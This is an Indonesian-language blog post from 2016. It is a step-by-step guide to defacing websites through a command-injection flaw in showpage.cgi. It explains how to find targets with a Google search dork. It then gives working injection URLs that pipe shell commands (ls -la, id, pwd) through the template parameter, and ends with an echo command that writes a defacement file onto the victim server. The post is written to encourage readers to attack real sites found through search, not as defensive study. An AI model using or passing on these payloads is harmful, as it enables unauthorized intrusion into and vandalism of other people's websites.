Selasa, 24 Mei 2016
Home »
» Deface melalui showpage.cgi
Deface melalui showpage.cgi
Deface melalui showpage.cgi
- Dari hasil percobaan saya yang dibantu dengan paman google. akhir nya saya dapat juga menemukan bug pada site yang menggunakan Showpage.cgi.
ok kita langsung aje ye......
-------------------------------------------------------------------------------
Buka browser anda ke alamat: www.google.com lalu ketikkan keyword: allinurl: showpage.cgi?template= atau kalo kamu tahu keyword lain yang bagus silahkan kamu berkreasi dengan keyword-keyword kamu tersebut.
oke.. sudah dapatkah target kita? klo sudah mari kita mulai. Caranya gampang buangat lho.. kamu tinggal berikan command shell seperti di linux.contohnya lagi nih ye.. misalnya
http://www.target.nl/showpage.cgi?template=template5.html&tekst=1.txt
nah kita tambahin aja.. menjadi:
http://www.target.nl/showpage.cgi?template=template5.html|ls -la|&tekst=1.txt
nah.. gampang bangat kan, nah kalau sudah begitu kita tinggal deface aje ok...
kita lihat dulu uid nye apakah uid user.
langkah pertama nye gini:
http://www.target.nl/showpage.cgi?template=template5.html|id|&tekst=1.txt
terus yang kedua nye :
http://www.target.nl/showpage.cgi?template=template5.html|pwd|&tekst=1.txt
maka akan muncul seperti ini :/home/arday/site90/web
setelah muncul kaya gitu tinggal deface aja ketik:
http://www.target.nl/showpage.cgi?template=template5.html|echo "Haloo arday " > arday.html|&tekst=1.txt
Gimana Mudah bukan...............ok sampai disini dulu artikel saya...
0 komentar:
Posting Komentar